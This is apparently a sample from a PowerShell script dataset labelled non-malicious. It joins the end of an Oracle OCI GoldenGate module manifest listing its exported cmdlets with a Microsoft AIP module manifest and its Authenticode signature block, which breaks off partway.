# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Copy-OCIGoldengateDeploymentBackup',
'Export-OCIGoldengateDeploymentWallet',
'Get-OCIGoldengateCertificate', 'Get-OCIGoldengateCertificatesList',
'Get-OCIGoldengateConnection',
'Get-OCIGoldengateConnectionAssignment',
'Get-OCIGoldengateConnectionAssignmentsList',
'Get-OCIGoldengateConnectionsList',
'Get-OCIGoldengateDatabaseRegistration',
'Get-OCIGoldengateDatabaseRegistrationsList',
'Get-OCIGoldengateDeployment', 'Get-OCIGoldengateDeploymentBackup',
'Get-OCIGoldengateDeploymentBackupsList',
'Get-OCIGoldengateDeploymentsList',
'Get-OCIGoldengateDeploymentTypesList',
'Get-OCIGoldengateDeploymentUpgrade',
'Get-OCIGoldengateDeploymentUpgradesList',
'Get-OCIGoldengateDeploymentVersionsList',
'Get-OCIGoldengateDeploymentWalletsOperationsList',
'Get-OCIGoldengateMessagesList', 'Get-OCIGoldengateTrailFilesList',
'Get-OCIGoldengateTrailSequencesList',
'Get-OCIGoldengateWorkRequest',
'Get-OCIGoldengateWorkRequestErrorsList',
'Get-OCIGoldengateWorkRequestLogsList',
'Get-OCIGoldengateWorkRequestsList',
'Import-OCIGoldengateDeploymentWallet',
'Invoke-OCIGoldengateCollectDeploymentDiagnostic',
'Invoke-OCIGoldengateDeploymentWalletExists',
'Invoke-OCIGoldengateRescheduleDeploymentUpgrade',
'Invoke-OCIGoldengateRollbackDeploymentUpgrade',
'Invoke-OCIGoldengateSnoozeDeploymentUpgrade',
'Invoke-OCIGoldengateTestConnectionAssignment',
'Invoke-OCIGoldengateUpgradeDeployment',
'Invoke-OCIGoldengateUpgradeDeploymentUpgrade',
'Move-OCIGoldengateConnectionCompartment',
'Move-OCIGoldengateDatabaseRegistrationCompartment',
'Move-OCIGoldengateDeploymentBackupCompartment',
'Move-OCIGoldengateDeploymentCompartment',
'New-OCIGoldengateCertificate', 'New-OCIGoldengateConnection',
'New-OCIGoldengateConnectionAssignment',
'New-OCIGoldengateDatabaseRegistration',
'New-OCIGoldengateDeployment', 'New-OCIGoldengateDeploymentBackup',
'Remove-OCIGoldengateCertificate', 'Remove-OCIGoldengateConnection',
'Remove-OCIGoldengateConnectionAssignment',
'Remove-OCIGoldengateDatabaseRegistration',
'Remove-OCIGoldengateDeployment',
'Remove-OCIGoldengateDeploymentBackup',
'Restore-OCIGoldengateDeployment', 'Start-OCIGoldengateDeployment',
'Stop-OCIGoldengateDeployment',
'Stop-OCIGoldengateDeploymentBackup',
'Stop-OCIGoldengateDeploymentUpgrade',
'Stop-OCIGoldengateSnoozeDeploymentUpgrade',
'Update-OCIGoldengateConnection',
'Update-OCIGoldengateDatabaseRegistration',
'Update-OCIGoldengateDeployment',
'Update-OCIGoldengateDeploymentBackup'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Goldengate'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_53_46.ps1
|
sample_53_46.ps1
|
@{
# This file should have the product name, else powershell module will not work please read "Use the correct Module Directory Name" section here https://msdn.microsoft.com/en-us/library/dd878350(v=vs.85).aspx
# Script module or binary module file associated with this manifest
RootModule = '..\..\AIP.dll'
# Version number of this module.
ModuleVersion = '3.0.58.0'
# ID used to uniquely identify this module
GUID = 'c219bda8-3669-4529-a01f-8381d49b5b92'
# Company or vendor of this module
CompanyName = 'Microsoft Corporation'
# Copyright statement for this module
Copyright = 'Copyright (c) Microsoft Corporation. All rights reserved.'
}
# SIG # Begin signature block
# MIIoLQYJKoZIhvcNAQcCoIIoHjCCKBoCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDclhuCn06WnGYy
# HmHKcOf+yvNPVNtCmWiAK5QuX/FlKaCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIDp4C34tgFVk9NiG+mBdGCOJ
# /PV0/B6GmwrHjcQLfhjlMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAbBXCeDvzXxBYYJSYE++Sxb+UrkIGA47EzOpniM5wiuKZhjWZBtWF+EWm
# nnHnxPv5urvLL7awqkmYZL+lc6V/OiVoH1IGDzsSoNj9tzJTwhmxAYwaH75CQ3af
# 0evMUNXgykvrfXaynt0iCrb1y0Qf4dDVuSkiEzerWlDBP+LV+gdjKHmuox63ROff
# CMmK2njokY8/GpEYXR6/pDpFfqUJoVy9cdzWIGsmrNypDfEz23C1XiDKIkMaSWM5
# TEAW3FwPY9CzSVcX69igvgvqVnIRF4ta45kpPUw3ZqY3ujlaKu8/zTqSgEck5Lz7
# CTNvcF7VFmEiMp4eHSRURHcGIOz/FqGCF5cwgheTBgorBgEEAYI3AwMBMYIXgzCC
# F38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq
# hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCCt8FQ6PCFiO9hWX3kxk7dK70QNlcz8i+3swA4G3rMX8gIGZjOSoXCj
# GBMyMDI0MDUwODExMDUzMi45MTVaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzcwMy0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg
# ghHtMIIHIDCCBQigAwIBAgITMwAAAeqaJHLVWT9hYwABAAAB6jANBgkqhkiG9w0B
# AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1
# MzBaFw0yNTAzMDUxODQ1MzBaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z
# MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzcwMy0wNUUwLUQ5NDcxJTAjBgNV
# BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQC1C1/xSD8gB9X7Ludoo2rWb2ksqaF65QtJkbQpmsc6
# G4bg5MOv6WP/uJ4XOJvKX/c1t0ej4oWBqdGD6VbjXX4T0KfylTulrzKtgxnxZh7q
# 1uD0Dy/w5G0DJDPb6oxQrz6vMV2Z3y9ZxjfZqBnDfqGon/4VDHnZhdas22svSC5G
# HywsQ2J90MM7L4ecY8TnLI85kXXTVESb09txL2tHMYrB+KHCy08ds36an7IcOGfR
# mhHbFoPa5om9YGpVKS8xeT7EAwW7WbXL/lo5p9KRRIjAlsBBHD1TdGBucrGC3TQX
# STp9s7DjkvvNFuUa0BKsz6UiCLxJGQSZhd2iOJTEfJ1fxYk2nY6SCKsV+VmtV5ai
# PzY/sWoFY542+zzrAPr4elrvr9uB6ci/Kci//EOERZEUTBPXME/ia+t8jrT2y3ug
# 15MSCVuhOsNrmuZFwaRCrRED0yz4V9wlMTGHIJW55iNM3HPVJJ19vOSvrCP9lsEc
# EwWZIQ1FCyPOnkM1fs7880dahAa5UmPqMk5WEKxzDPVp081X5RQ6HGVUz6ZdgQ0j
# cT59EG+CKDPRD6mx8ovzIpS/r/wEHPKt5kOhYrjyQHXc9KHKTWfXpAVj1Syqt5X4
# nr+Mpeubv+N/PjQEPr0iYJDjSzJrqILhBs5pytb6vyR8HUVMp+mAA4rXjOw42vkH
# fQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFCuBRSWiUebpF0BU1MTIcosFblleMB8G
# A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG
# Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy
# MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w
# XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy
# dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG
# A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD
# AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQAog61WXj9+/nxVbX3G37KgvyoNAnuu2w3H
# oWZj3H0YCeQ3b9KSZThVThW4iFcHrKnhFMBbXJX4uQI53kOWSaWCaV3xCznpRt3c
# 4/gSn3dvO/1GP3MJkpJfgo56CgS9zLOiP31kfmpUdPqekZb4ivMR6LoPb5HNlq0W
# bBpzFbtsTjNrTyfqqcqAwc6r99Df2UQTqDa0vzwpA8CxiAg2KlbPyMwBOPcr9hJT
# 8sGpX/ZhLDh11dZcbUAzXHo1RJorSSftVa9hLWnzxGzEGafPUwLmoETihOGLqIQl
# Cpvr94Hiak0Gq0wY6lduUQjk/lxZ4EzAw/cGMek8J3QdiNS8u9ujYh1B7NLr6t3I
# glfScDV3bdVWet1itTUoKVRLIivRDwAT7dRH13Cq32j2JG5BYu/XitRE8cdzaJmD
# VBzYhlPl9QXvC+6qR8I6NIN/9914bTq/S4g6FF4f1dixUxE4qlfUPMixGr0Ft4/S
# 0P4fwmhs+WHRn62PB4j3zCHixKJCsRn9IR3ExBQKQdMi5auiqB6xQBADUf+F7hSK
# ZfbA8sFSFreLSqhvj+qUQF84NcxuaxpbJWVpsO18IL4Qbt45Cz/QMa7EmMGNn7a8
# MM3uTQOlQy0u6c/jq111i1JqMjayTceQZNMBMM5EMc5Dr5m3T4bDj9WTNLgP8SFe
# 3EqTaWVMOTCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI
# hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy
# MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC
# AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg
# M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF
# dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6
# GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp
# Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu
# yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E
# XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0
# lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q
# GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ
# +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA
# PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw
# EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG
# NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV
# MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj
# cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK
# BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC
# AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX
# zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v
# cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI
# KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG
# 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x
# M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC
# VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449
# xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM
# nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS
# PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d
# Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn
# GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs
# QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL
# jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL
# 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNQ
# MIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn
# MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjM3MDMtMDVFMC1EOTQ3MSUwIwYDVQQD
# ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCJ
# 2x7cQfjpRskJ8UGIctOCkmEkj6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6eVRJTAiGA8yMDI0MDUwODAxMTcy
# NVoYDzIwMjQwNTA5MDExNzI1WjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDp5VEl
# AgEAMAoCAQACAjlkAgH/MAcCAQACAhQYMAoCBQDp5qKlAgEAMDYGCisGAQQBhFkK
# BAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJ
# KoZIhvcNAQELBQADggEBAFs56qTDWSiXc9mb8Vqq8xNSlzdy/O9/ulRTFHmNjWkq
# yYiayAQkp6FRN+wLrhyz3m7z3OEVpygN+lETNrxdpt8CDwrZs1UoTNTp2rO/wKWt
# IvqrfqitzbYxHbQjdxYYFjjgS9+p043fG77yiyLxot1dtQNK22/EuEWnGdOE5JLh
# cBSLHPpjImIZDmjTnRAgy/CNZj9eSgGWj84OEAsZMv2eVvdbUwWMAkatVrCL+ntK
# i2VTUKOvDeOOSj1LIhm7pQdicn2yYR+7nl9oQLRo0LeYr2qUJ62Pe+6vb60o23vE
# W3kX6HZ5OVFMcGixQOw03vg5nnpUIrQYnGdIbzW0w6QxggQNMIIECQIBATCBkzB8
# MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk
# bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N
